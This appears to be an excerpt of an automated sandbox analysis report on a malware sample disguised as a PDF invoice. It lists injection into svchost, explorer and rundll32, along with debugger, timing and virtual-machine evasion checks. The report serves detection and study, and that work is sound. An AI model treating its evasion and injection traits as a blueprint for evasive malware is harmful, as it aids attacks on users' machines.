          Source: Binary string: wntdll.pdbUGP source: Genesis RMS Private Limited November 2024 pdf.exe, 00000000.00000003.1669851309.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, Genesis RMS Private Limited November 2024 pdf.exe, 00000000.00000003.1670101325.0000000004210000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1734632822.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1672216614.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1673809619.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1734632822.000000000349E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1739113966.0000000004B95000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1734729766.00000000049E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4130005798.0000000004D40000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4130005798.0000000004EDE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Genesis RMS Private Limited November 2024 pdf.exe, 00000000.00000003.1669851309.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, Genesis RMS Private Limited November 2024 pdf.exe, 00000000.00000003.1670101325.0000000004210000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1734632822.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1672216614.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1673809619.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1734632822.000000000349E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000003.00000003.1739113966.0000000004B95000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1734729766.00000000049E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4130005798.0000000004D40000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4130005798.0000000004EDE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: svchost.exe, 00000001.00000003.1733882556.0000000002C3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1733820601.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1734555328.0000000002FE0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000003.00000002.4129174165.0000000000C20000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: svchost.exe, 00000001.00000003.1733882556.0000000002C3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1733820601.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1734555328.0000000002FE0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000003.00000002.4129174165.0000000000C20000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000002.00000002.4141763780.00000000110CF000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000003.00000002.4130564299.000000000528F000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000003.00000002.4129438375.0000000003142000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000002.00000002.4141763780.00000000110CF000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000003.00000002.4130564299.000000000528F000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000003.00000002.4129438375.0000000003142000.00000004.00000020.00020000.00000000.sdmp
          Source: Genesis RMS Private Limited November 2024 pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: Genesis RMS Private Limited November 2024 pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: Genesis RMS Private Limited November 2024 pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: Genesis RMS Private Limited November 2024 pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: Genesis RMS Private Limited November 2024 pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Code function: 0_2_007CC304 LoadLibraryA,GetProcAddress
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Code function: 0_2_0075C590 push eax; retn 0075h 0_2_0075C599
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Code function: 0_2_007B8719 push FFFFFF8Bh; iretd 0_2_007B871B
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Code function: 0_2_0077E94F push edi; ret 0_2_0077E951
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Code function: 0_2_0077EA68 push esi; ret 0_2_0077EA6A
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Code function: 0_2_00778B85 push ecx; ret 0_2_00778B98
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Code function: 0_2_0077EC43 push esi; ret 0_2_0077EC45
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Code function: 0_2_0077ED2C push edi; ret 0_2_0077ED2E
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041C843 push eax; retf 1_2_0041C846
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00417078 push ds; ret 1_2_00417079
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041DC69 push 22826EB8h; iretd 1_2_0041DC7D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041D475 push eax; ret 1_2_0041D4C8
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041D4C2 push eax; ret 1_2_0041D4C8
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041D4CB push eax; ret 1_2_0041D532
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041648D push esi; retf 1_2_0041648E
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00416CAF push ebp; retf 1_2_00416CB0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041D52C push eax; ret 1_2_0041D532
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004165E4 push ecx; iretd 1_2_004165E7
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033309AD push ecx; mov dword ptr [esp], ecx 1_2_033309B6
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_029EEB1E push esp; retn 0000h 1_2_029EEB1F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_029EEB02 push esp; retn 0000h 1_2_029EEB03
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_029EE9B5 push esp; retn 0000h 1_2_029EEAE7
          Source: C:\Windows\explorer.exe | Code function: 2_2_0E617B02 push esp; retn 0000h 2_2_0E617B03
          Source: C:\Windows\explorer.exe | Code function: 2_2_0E617B1E push esp; retn 0000h 2_2_0E617B1F
          Source: C:\Windows\explorer.exe | Code function: 2_2_0E6179B5 push esp; retn 0000h 2_2_0E617AE7
          Source: C:\Windows\explorer.exe | Code function: 2_2_10D289B5 push esp; retn 0000h 2_2_10D28AE7
          Source: C:\Windows\explorer.exe | Code function: 2_2_10D28B1E push esp; retn 0000h 2_2_10D28B1F
          Source: C:\Windows\explorer.exe | Code function: 2_2_10D28B02 push esp; retn 0000h 2_2_10D28B03
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_00C26883 push ecx; ret 3_2_00C26896
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_00C2682D push ecx; ret 3_2_00C26840
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04D427FA pushad ; ret 3_2_04D427F9
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04D4225F pushad ; ret 3_2_04D427F9
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | File created: \genesis rms private limited november 2024 pdf.exe
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeFile created: \genesis rms private limited november 2024 pdf.exeJump to behavior
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_00754A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00754A35
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007D55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_007D55FD
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007733C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007733C7
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe API/Special instruction interceptor: Address: 18D3264
          Source: C:\Windows\SysWOW64\svchost.exe API/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\svchost.exe API/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\svchost.exe API/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\svchost.exe API/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\svchost.exe API/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Windows\SysWOW64\svchost.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 2C49904 second address: 2C4990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 2C49B6E second address: 2C49B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00409AA0 rdtsc 1_2_00409AA0
          Source: C:\Windows\explorer.exe Window / User API: threadDelayed 1282
          Source: C:\Windows\explorer.exe Window / User API: threadDelayed 8651
          Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 889
          Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 860
          Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 2265
          Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 7707
          Source: C:\Windows\explorer.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-98712
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe API coverage: 4.6 %
          Source: C:\Windows\SysWOW64\svchost.exe API coverage: 2.1 %
          Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 2.0 %
          Source: C:\Windows\explorer.exe TID: 8064 Thread sleep count: 1282 > 30
          Source: C:\Windows\explorer.exe TID: 8064 Thread sleep time: -2564000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 8064 Thread sleep count: 8651 > 30
          Source: C:\Windows\explorer.exe TID: 8064 Thread sleep time: -17302000s >= -30000s
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 7904 Thread sleep count: 2265 > 30
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 7904 Thread sleep time: -4530000s >= -30000s
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 7904 Thread sleep count: 7707 > 30
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 7904 Thread sleep time: -15414000s >= -30000s
          Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_007B4696 GetFileAttributesW,FindFirstFileW,FindClose 0_2_007B4696
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_007BC93C FindFirstFileW,FindClose 0_2_007BC93C
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_007BC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf 0_2_007BC9C7
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_007BF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose 0_2_007BF200
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_007BF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose 0_2_007BF35D
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_007BF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose 0_2_007BF65E
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_007B3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose 0_2_007B3A2B
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_007B3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose 0_2_007B3D4E
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_007BBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose 0_2_007BBF27
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_00754AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo 0_2_00754AFE
          Source: explorer.exe, 00000002.00000002.4135822231.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000002.00000000.1691972906.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 00000002.00000000.1691972906.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000002.00000002.4135822231.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000002.00000000.1688723563.00000000079FB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
          Source: explorer.exe, 00000002.00000002.4129302361.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 00000002.00000000.1688723563.00000000079FB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000003.3105810680.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000002.00000002.4132184132.00000000078AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000002.00000000.1691972906.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
          Source: explorer.exe, 00000002.00000003.3107468764.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691972906.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691972906.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3107468764.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4134891449.00000000097D4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000002.00000003.3105810680.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000002.00000002.4132184132.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1688723563.0000000007A34000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnx
          Source: explorer.exe, 00000002.00000002.4134788894.0000000009660000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 00000002.00000002.4129302361.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000002.00000002.4129302361.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00409AA0 rdtsc 1_2_00409AA0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040ACE0 LdrLoadDll 1_2_0040ACE0
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_007C41FD BlockInput 0_2_007C41FD
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_00753B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW 0_2_00753B4C
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_00785CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer 0_2_00785CCC
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_007CC304 LoadLibraryA,GetProcAddress 0_2_007CC304
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_018D3530 mov eax, dword ptr fs:[00000030h] 0_2_018D3530
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_018D34D0 mov eax, dword ptr fs:[00000030h] 0_2_018D34D0
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_018D1E70 mov eax, dword ptr fs:[00000030h] 0_2_018D1E70
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0332C310 mov ecx, dword ptr fs:[00000030h] 1_2_0332C310
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03350310 mov ecx, dword ptr fs:[00000030h] 1_2_03350310
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0336A30B mov eax, dword ptr fs:[00000030h] 1_2_0336A30B
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0336A30B mov eax, dword ptr fs:[00000030h] 1_2_0336A30B
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0336A30B mov eax, dword ptr fs:[00000030h] 1_2_0336A30B
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033D437C mov eax, dword ptr fs:[00000030h] 1_2_033D437C
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B035C mov eax, dword ptr fs:[00000030h] 1_2_033B035C
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B035C mov eax, dword ptr fs:[00000030h] 1_2_033B035C
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B035C mov eax, dword ptr fs:[00000030h] 1_2_033B035C
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B035C mov ecx, dword ptr fs:[00000030h] 1_2_033B035C
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B035C mov eax, dword ptr fs:[00000030h] 1_2_033B035C
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B035C mov eax, dword ptr fs:[00000030h] 1_2_033B035C
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033FA352 mov eax, dword ptr fs:[00000030h] 1_2_033FA352
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033D8350 mov ecx, dword ptr fs:[00000030h] 1_2_033D8350
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h] 1_2_033B2349
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h] 1_2_033B2349
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h] 1_2_033B2349
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h] 1_2_033B2349
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h] 1_2_033B2349
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h] 1_2_033B2349
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h] 1_2_033B2349
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h] 1_2_033B2349
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h] 1_2_033B2349
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h] 1_2_033B2349
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h] 1_2_033B2349
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h] 1_2_033B2349
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h] 1_2_033B2349
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h] 1_2_033B2349
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h] 1_2_033B2349
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03328397 mov eax, dword ptr fs:[00000030h] 1_2_03328397
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03328397 mov eax, dword ptr fs:[00000030h] 1_2_03328397
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03328397 mov eax, dword ptr fs:[00000030h] 1_2_03328397
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0332E388 mov eax, dword ptr fs:[00000030h] 1_2_0332E388
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0332E388 mov eax, dword ptr fs:[00000030h] 1_2_0332E388
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0332E388 mov eax, dword ptr fs:[00000030h] 1_2_0332E388
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0335438F mov eax, dword ptr fs:[00000030h] 1_2_0335438F
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0335438F mov eax, dword ptr fs:[00000030h] 1_2_0335438F
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0334E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0334E3F0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0334E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0334E3F0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0334E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0334E3F0
